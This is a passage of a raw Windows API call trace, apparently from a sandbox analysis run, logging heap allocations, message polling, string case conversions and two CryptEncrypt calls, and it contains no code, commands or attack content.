hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854788 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0214.935] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0214.935] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0214.935] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0214.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854c08 [0214.935] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0214.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0214.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0214.935] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0214.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0214.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0214.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0214.936] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0214.936] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0214.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.936] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854c08 | out: hHeap=0x2af0000) returned 1 [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0214.937] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0214.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0214.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0214.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0214.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0214.937] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5d8 [0214.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0214.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.938] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0214.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0214.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0214.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a95848 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0214.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab4e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.941] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x5b7d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x5b80) returned 1 [0214.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.941] CharLowerBuffW (in: lpsz="byte[23424]", cchLength=0xb | out: lpsz="byte[23424]") returned 0xb [0214.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.943] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.943] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.943] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.943] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.943] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab6f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.943] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a95848*, pdwDataLen=0x8cef60*=0x5b7d, dwBufLen=0x5b80 | out: pbData=0x2a95848*, pdwDataLen=0x8cef60*=0x5b80) returned 1 [0214.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.944] PeekMessageW (in: 